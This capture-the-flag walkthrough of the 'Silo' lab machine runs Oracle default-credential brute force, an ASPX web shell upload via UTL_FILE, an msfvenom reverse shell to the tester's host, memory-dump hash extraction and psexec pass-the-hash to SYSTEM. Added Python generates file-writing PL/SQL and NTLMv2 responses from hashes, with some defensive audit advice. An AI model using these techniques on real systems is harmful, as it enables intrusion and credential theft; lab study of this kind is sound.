The first step was to run Nmap against the machine to identify open ports and the services behind them (all TCP ports with -p-, version detection and default scripts with -sV -sC, and OS detection with -O):
# Nmap 7.91 scan initiated Tue Dec 29 08:06:50 2020 as: nmap -O -sV -sC -p- -oN scan 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.021s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-29T13:09:29
|_  start_date: 2020-12-29T11:37:20

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 29 08:09:33 2020 -- 1 IP address (1 host up) scanned in 163.06 seconds
You can see from the output that a number of ports are open: IIS on 80, SMB on 139/445, WinRM on 5985, an Oracle TNS listener on 1521, and the usual RPC range. I started with port 80, as HTTP is the most familiar to me, but it only served the default IIS page, and DirBuster found no hidden directories.
I next moved on to the Oracle TNS listener on port 1521. ODAT (Oracle Database Attacking Tool) can enumerate and exploit Oracle listeners and databases. I downloaded and installed it, then ran it with the all module, which runs every check it has against the target: the TNS poisoning test, SID enumeration, credential guessing against each SID found, and then each exploitation module with whatever credentials it discovers.
┌──(root💀kali)-[/home/kali/Documents/silo/odat]
└─# python3 ./odat.py all -s 10.10.10.82

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

[2] (10.10.10.82:1521): Searching valid SIDs
[2.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
100% |################################| Time: 00:00:52
[2.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |################################| Time: 00:00:01
[2.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...
100% |################################| Time: 00:00:42
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB

[3] (10.10.10.82:1521): Searching valid accounts on the XE SID
The login cis has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
A
The login #internal has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
C
[+] Valid credentials found: scott/tiger. Continue...
100% |################################| Time: 00:03:53
[+] Accounts found on 10.10.10.82:1521/XE: scott/tiger

[4] (10.10.10.82:1521): Searching valid accounts on the XEXDB SID
The login abm has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[+] Valid credentials found: scott/tiger. Continue...
100% |################################| Time: 00:02:54
[+] Accounts found on 10.10.10.82:1521/XEXDB: scott/tiger

[5] (10.10.10.82:1521): Testing all modules on the XE SID with the scott/tiger account
100% |################################| Time: 00:00:49
You can see from the output that two SIDs were discovered, XE and XEXDB, and that the default credentials scott/tiger were valid on both. With those credentials, ODAT's utlfile module can write arbitrary files on the database server through the UTL_FILE package. The listener and IIS run on the same host, and by default IIS serves web content from c:\inetpub\wwwroot, so I uploaded an ASPX web shell into that directory so it could be reached through the browser. The ASPX file was the default Kali one found in /usr/share/webshells/aspx/cmdasp.aspx. Note the --sysdba flag in the command below: scott was allowed to connect AS SYSDBA, which is what gives a default-credential account enough privilege to write files anywhere on the filesystem.
┌──(root💀kali)-[/home/kali/Documents/silo/odat]
└─# python3 odat.py utlfile --putFile "c:\\inetpub\wwwroot" "cmdasp.aspx" "cmdasp.aspx" -s 10.10.10.82 -d XE -U scott -P tiger --sysdba

[1] (10.10.10.82:1521): Put the cmdasp.aspx local file in the c:\inetpub\wwwroot folder like cmdasp.aspx on the 10.10.10.82 server
[+] The cmdasp.aspx file was created on the c:\inetpub\wwwroot directory on the 10.10.10.82 server like the cmdasp.aspx file
Once this had run, I browsed to http://10.10.10.82/cmdasp.aspx and was greeted with the ASPX shell.
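To make clear what utlfile --putFile does on the database side, here is an added Python example (mine, not ODAT's code) that generates the anonymous PL/SQL block an account with SYSDBA or CREATE ANY DIRECTORY can run to drop a file: create a directory object for the target folder, open the file with UTL_FILE.FOPEN in binary write mode, and write the content with UTL_FILE.PUT_RAW in hex chunks. The directory object name ODAT_WWWROOT and the 1024-byte chunk size are my choices; decode_block_payload exists so the chunking can be verified offline, and the sample content in the test is constructed.

```python
import binascii
import re

CHUNK = 1024  # bytes per PUT_RAW call; 2048 hex characters stays well inside PL/SQL literal limits


def utl_file_write_block(directory: str, filename: str, data: bytes,
                         dir_object: str = "ODAT_WWWROOT") -> str:
    """Return an anonymous PL/SQL block that writes `data` to <directory>\\<filename>.

    Needs CREATE ANY DIRECTORY (implied by SYSDBA) and EXECUTE on UTL_FILE;
    the database server process must also be able to write to `directory`.
    """
    if "'" in directory or "'" in filename or "'" in dir_object:
        raise ValueError("single quotes are not escaped by this generator")
    hexdata = binascii.hexlify(data).decode()
    puts = "\n".join(
        "  UTL_FILE.PUT_RAW(fh, HEXTORAW('%s'));" % hexdata[i:i + CHUNK * 2]
        for i in range(0, len(hexdata), CHUNK * 2)
    )
    return (
        "DECLARE\n"
        "  fh UTL_FILE.FILE_TYPE;\n"
        "BEGIN\n"
        "  EXECUTE IMMEDIATE 'CREATE OR REPLACE DIRECTORY %s AS ''%s''';\n"
        "  fh := UTL_FILE.FOPEN('%s', '%s', 'wb', 32767);\n"
        "%s\n"
        "  UTL_FILE.FCLOSE(fh);\n"
        "END;"
    ) % (dir_object, directory, dir_object, filename, puts)


def decode_block_payload(block: str) -> bytes:
    """Recover the bytes a generated block would write (joins every HEXTORAW chunk)."""
    return bytes.fromhex("".join(re.findall(r"HEXTORAW\('([0-9a-f]*)'\)", block)))


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 4:
        sys.exit("usage: %s <remote-dir> <remote-name> <local-file>" % sys.argv[0])
    with open(sys.argv[3], "rb") as fp:
        print(utl_file_write_block(sys.argv[1], sys.argv[2], fp.read()))
```

On the defending side the same privileges are what to audit: DBA_SYS_PRIVS for CREATE ANY DIRECTORY, DBA_TAB_PRIVS for EXECUTE on UTL_FILE granted to PUBLIC, and V$PWFILE_USERS for who holds SYSDBA. A default account like scott/tiger with any of those is a remote file write on the database host.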
I then created a reverse shell with msfvenom so I could interact with the machine more easily than through the web form.
┌──(root💀kali)-[/var/www]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2600 -f exe > reverse2600.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
This was then uploaded to the Silo machine using the ODAT tool and the same method as before.
┌──(root💀kali)-[/home/kali/Documents/silo/odat]
└─# python3 odat.py utlfile --putFile "c:\\inetpub\wwwroot" "reverse2600.exe" "reverse2600.exe" -s 10.10.10.82 -d XE -U scott -P tiger --sysdba

[1] (10.10.10.82:1521): Put the reverse2600.exe local file in the c:\inetpub\wwwroot folder like reverse2600.exe on the 10.10.10.82 server
[+] The reverse2600.exe file was created on the c:\inetpub\wwwroot directory on the 10.10.10.82 server like the reverse2600.exe file
I then started a Netcat listener on the Kali machine on port 2600.
┌──(root💀kali)-[/var/www]
└─# nc -nvlp 2600
listening on [any] 2600 ...
I then ran reverse2600.exe through the cmdasp.aspx web interface by entering the command c:\inetpub\wwwroot\reverse2600.exe. Netcat caught the shell, and from it I was able to read the user flag. The starting directory, c:\windows\system32\inetsrv, shows the process was spawned by IIS, so the shell runs in the web server's context rather than as Phineas; it was still enough to read the desktop.
┌──(root💀kali)-[/var/www]
└─# nc -nvlp 2600
listening on [any] 2600 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>cd /Users
cd /Users

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 78D4-EA4D

 Directory of c:\Users

01/04/2018  09:40 PM    <DIR>          .
01/04/2018  09:40 PM    <DIR>          ..
01/03/2018  01:03 AM    <DIR>          .NET v2.0
01/03/2018  01:03 AM    <DIR>          .NET v2.0 Classic
01/03/2018  09:23 PM    <DIR>          .NET v4.5
01/03/2018  09:23 PM    <DIR>          .NET v4.5 Classic
01/01/2018  12:49 AM    <DIR>          Administrator
01/03/2018  01:03 AM    <DIR>          Classic .NET AppPool
01/07/2018  02:04 PM    <DIR>          Phineas
08/22/2013  03:39 PM    <DIR>          Public
               0 File(s)              0 bytes
              10 Dir(s)  15,030,591,488 bytes free

c:\Users>cd Phineas
cd Phineas

c:\Users\Phineas>cd Desktop
cd Desktop

c:\Users\Phineas\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 78D4-EA4D

 Directory of c:\Users\Phineas\Desktop

01/07/2018  02:03 PM    <DIR>          .
01/07/2018  02:03 PM    <DIR>          ..
01/05/2018  10:56 PM               300 Oracle issue.txt
01/04/2018  09:41 PM                32 user.txt
               2 File(s)            332 bytes
               2 Dir(s)  15,035,412,480 bytes free

c:\Users\Phineas\Desktop>type user.txt
type user.txt
[REDACTED]
The next step was to escalate privileges. I opened the "Oracle issue.txt" file that was also on Phineas's desktop.
c:\Users\Phineas\Desktop>more "Oracle issue.txt"
more "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
£%Hm8646uC$

c:\Users\Phineas\Desktop>
I visited the link and downloaded the dump file, then opened it with Volatility, starting with imageinfo to identify the image format and the candidate profiles.
┌──(root💀kali)-[/home/kali/Documents/silo]
└─# python ../Programs/volatility/volatility/vol.py imageinfo -f b.dmp
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win8SP0x64, Win10x64_17134, Win81U1x64, Win10x64_14393, Win10x64_18362, Win2012R2x64, Win2012R2x64_18340, Win10x64, Win2016x64_14393, Win10x64_16299, Win10x64_10240_17770, Win10x64_19041, Win2012x64, Win10x64_17763, Win8SP1x64_18340, Win10x64_10586, Win8SP1x64, Win10x64_15063 (Instantiated with Win10x64_15063)
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : WindowsCrashDumpSpace64 (Unnamed AS)
                     AS Layer3 : FileAddressSpace (/home/kali/Documents/silo/b.dmp)
                      PAE type : No PAE
                           DTB : 0x1a7000L
                          KDBG : 0xf80078520a30L
          Number of Processors : 2
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff8007857b000L
                KPCR for CPU 1 : 0xffffd000207e8000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2018-01-05 22:18:07 UTC+0000
     Image local date and time : 2018-01-05 22:18:07 +0000
We can see from the output that Volatility parsed the file as a 64-bit Windows crash dump (WindowsCrashDumpSpace64) and found the KDBG, but it suggested a long list of possible profiles and instantiated the wrong one (Win10x64_15063). hashdump needs the right profile, so I determined the operating system with the systeminfo command on the Silo machine: Windows Server 2012 R2, which also matches the "Version 6.3.9600" banner in the shell above. That gives the Win2012R2x64 profile, which is in the suggested list.
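Most of what imageinfo printed (DTB, processor count, image time, and the build number that narrows the profile list) comes straight from the crash dump header, so a dump can be triaged without Volatility. The Python below is an added example, not part of the original write-up or of Volatility: it reads the _DMP_HEADER64 fields Volatility's crash dump address space uses, maps the build number to candidate Volatility 2.6 profile names, and converts the FILETIME system time. build_sample_header is a constructed header carrying the values reported above (DTB 0x1a7000, 2 CPUs, build 9600, 2018-01-05 22:18:07 UTC); it is not the real b.dmp, and the KDBG pointer is left zero because the page's KDBG came from a search, not from the header.

```python
import struct
import sys
from datetime import datetime, timedelta, timezone

HEADER_SIZE = 0x2000   # the 64-bit dump header occupies the first two pages
# (offset, struct format) of the _DMP_HEADER64 fields read here
FIELDS = {
    "Signature":           (0x00, "4s"),
    "ValidDump":           (0x04, "4s"),
    "MajorVersion":        (0x08, "<I"),   # 0xF free build, 0xC checked build
    "MinorVersion":        (0x0C, "<I"),   # NT build number
    "DirectoryTableBase":  (0x10, "<Q"),   # kernel CR3, the DTB imageinfo prints
    "PfnDataBase":         (0x18, "<Q"),
    "PsLoadedModuleList":  (0x20, "<Q"),
    "PsActiveProcessHead": (0x28, "<Q"),
    "MachineImageType":    (0x30, "<I"),   # 0x8664 = AMD64
    "NumberProcessors":    (0x34, "<I"),
    "BugCheckCode":        (0x38, "<I"),
    "KdDebuggerDataBlock": (0x80, "<Q"),
    "SystemTime":          (0xFA8, "<Q"),  # FILETIME at the moment of the dump
}
# Build number -> Volatility 2.6 profiles that share it. Client and server share a
# build, so the header alone cannot pick Win81U1x64 vs Win2012R2x64: that is what
# systeminfo (or the product type from the registry) settles.
BUILD_PROFILES = {
    7600:  "Win7SP0x64 / Win2008R2SP0x64",
    7601:  "Win7SP1x64 / Win2008R2SP1x64",
    9200:  "Win8SP0x64 / Win2012x64",
    9600:  "Win8SP1x64 / Win81U1x64 / Win2012R2x64",
    10240: "Win10x64_10240_17770",
    14393: "Win10x64_14393 / Win2016x64_14393",
}
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def from_filetime(ft: int) -> datetime:
    """FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def to_filetime(dt: datetime) -> int:
    delta = dt - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_dump_header(blob: bytes) -> dict:
    """Decode the fields in FIELDS; reject anything that is not a PAGEDU64 dump."""
    if len(blob) < HEADER_SIZE:
        raise ValueError("need at least %d bytes of header, got %d" % (HEADER_SIZE, len(blob)))
    if blob[:8] != b"PAGEDU64":
        raise ValueError("not a 64-bit Windows crash dump (signature %r)" % blob[:8])
    return {name: struct.unpack_from(fmt, blob, off)[0] for name, (off, fmt) in FIELDS.items()}


def triage(header: dict) -> dict:
    """The handful of values a responder wants before choosing a Volatility profile."""
    machine = header["MachineImageType"]
    return {
        "arch": "AMD64" if machine == 0x8664 else hex(machine),
        "build": header["MinorVersion"],
        "candidate_profiles": BUILD_PROFILES.get(header["MinorVersion"], "unknown build"),
        "dtb": header["DirectoryTableBase"],
        "cpus": header["NumberProcessors"],
        "system_time": from_filetime(header["SystemTime"]),
    }


def build_sample_header() -> bytes:
    """Constructed header with the values imageinfo reported for Silo's dump; not the real file."""
    buf = bytearray(HEADER_SIZE)
    values = {
        "Signature": b"PAGE", "ValidDump": b"DU64", "MajorVersion": 0xF, "MinorVersion": 9600,
        "DirectoryTableBase": 0x1A7000, "MachineImageType": 0x8664, "NumberProcessors": 2,
        "SystemTime": to_filetime(datetime(2018, 1, 5, 22, 18, 7, tzinfo=timezone.utc)),
    }
    for name, value in values.items():
        off, fmt = FIELDS[name]
        struct.pack_into(fmt, buf, off, value)
    return bytes(buf)


if __name__ == "__main__":
    source = open(sys.argv[1], "rb").read(HEADER_SIZE) if len(sys.argv) > 1 else build_sample_header()
    for key, value in triage(parse_dump_header(source)).items():
        print("%-20s %s" % (key, hex(value) if key == "dtb" else value))
```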
┌──(root💀kali)-[/home/kali/Documents/silo]
└─# python ../Programs/volatility/volatility/vol.py hashdump --profile=Win2012R2x64 -f b.dmp
Volatility Foundation Volatility Framework 2.6.1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
Each line is user:RID:LM hash:NT hash. The LM field is aad3b435b51404eeaad3b435b51404ee for every account, which is the LM hash of an empty password, meaning LM hashes are not stored; the NT hash is the useful part. I tried to crack the Administrator NT hash but had no luck. Cracking is not required, though: NTLM authentication only proves possession of the NT hash, never the password, so the hash can be used as-is. I used Impacket's psexec.py to log in to the Silo machine by passing the captured hash.
┌──(root💀kali)-[/var/www]
└─# python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 Administrator@10.10.10.82
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.82.....
[*] Found writable share ADMIN$
[*] Uploading file ChGRCoZk.exe
[*] Opening SVCManager on 10.10.10.82.....
[*] Creating service mUVA on 10.10.10.82.....
[*] Starting service mUVA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd /users

C:\Users>cd Administrator

C:\Users\Administrator>dir
 Volume in drive C has no label.
 Volume Serial Number is 78D4-EA4D

 Directory of C:\Users\Administrator

01/01/2018  12:49 AM    <DIR>          .
01/01/2018  12:49 AM    <DIR>          ..
01/06/2018  09:13 PM    <DIR>          Contacts
01/07/2018  01:34 PM    <DIR>          Desktop
01/06/2018  09:13 PM    <DIR>          Documents
01/07/2018  09:35 PM    <DIR>          Downloads
01/06/2018  09:13 PM    <DIR>          Favorites
01/06/2018  09:13 PM    <DIR>          Links
01/06/2018  09:13 PM    <DIR>          Music
01/01/2018  12:11 AM    <DIR>          Oracle
01/06/2018  09:13 PM    <DIR>          Pictures
01/06/2018  09:13 PM    <DIR>          Saved Games
01/06/2018  09:13 PM    <DIR>          Searches
01/06/2018  09:13 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  16,938,364,928 bytes free

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 78D4-EA4D

 Directory of C:\Users\Administrator\Desktop

01/07/2018  01:34 PM    <DIR>          .
01/07/2018  01:34 PM    <DIR>          ..
01/03/2018  11:38 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  16,938,364,928 bytes free

C:\Users\Administrator\Desktop>type root.txt
[REDACTED]
From the output you can see that this was successful: psexec.py authenticated to the Silo machine as Administrator using the NT hash alone, uploaded a service binary to the ADMIN$ share and started it as a service, which is why whoami reports nt authority\system rather than Administrator. From that shell I was able to read the root flag.
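Why cracking was unnecessary: NTLM never transmits the password, only a keyed MAC whose key is derived from the NT hash, so anyone holding the hash can produce the same response as the password holder. The Python below is an added example (mine, not code from this write-up or from Impacket) showing the pieces: MD4 over the UTF-16LE password to make an NT hash (a pure-Python MD4 is included because OpenSSL 3 builds often leave md4 out of hashlib), a parser for hashdump lines, and the NTLMv2 response computed from either the password or the hash, giving identical bytes. The hashdump lines embedded below are the three from the dump above; the Guest entry is the NT hash of an empty password, which the example verifies. The server challenge, client nonce and timestamp in the test are constructed values.

```python
import hashlib
import hmac
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" : LM hashing disabled
# The three lines Volatility's hashdump produced from Silo's memory dump.
HASHDUMP_SAMPLE = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::"""


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, in pure Python so it works where hashlib lacks md4."""
    mask = 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                   # round 1: X[0..15]
            a = rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2: X[0,4,8,12,1,5,...]
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3: X[0,8,4,12,2,10,...]
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); no salt, so equal passwords give equal hashes."""
    return md4(password.encode("utf-16le"))


def parse_hashdump_line(line: str) -> dict:
    user, rid, lm, nt = line.strip().rstrip(":").split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "lm_empty": lm.lower() == EMPTY_LM}


def parse_hashdump(text: str) -> list:
    return [parse_hashdump_line(l) for l in text.splitlines() if l.strip()]


def ntowf_v2(nthash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 keyed by the NT hash over UPPER(user) + domain."""
    return hmac.new(nthash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def ntlmv2_blob(filetime: int, client_nonce: bytes, target_info: bytes = b"\x00" * 4) -> bytes:
    """Client-side blob; target_info defaults to a lone MsvAvEOL pair."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime) + client_nonce
            + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nthash: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr || blob, exactly what a pass-the-hash client sends: no password needed."""
    nt_proof = hmac.new(ntowf_v2(nthash, user, domain), server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


if __name__ == "__main__":
    for rec in parse_hashdump(HASHDUMP_SAMPLE):
        tag = " (empty password)" if rec["nt"] == nt_hash("").hex() else ""
        print("%-14s rid=%-4d nt=%s%s" % (rec["user"], rec["rid"], rec["nt"], tag))
```

The same property is the detection angle: a pass-the-hash logon looks like any NTLM network logon (event 4624, logon type 3, authentication package NTLM) from a host that never did a Kerberos TGT request; disabling NTLM where possible, or at least alerting on NTLM network logons by privileged local accounts, is what closes the path psexec.py used here.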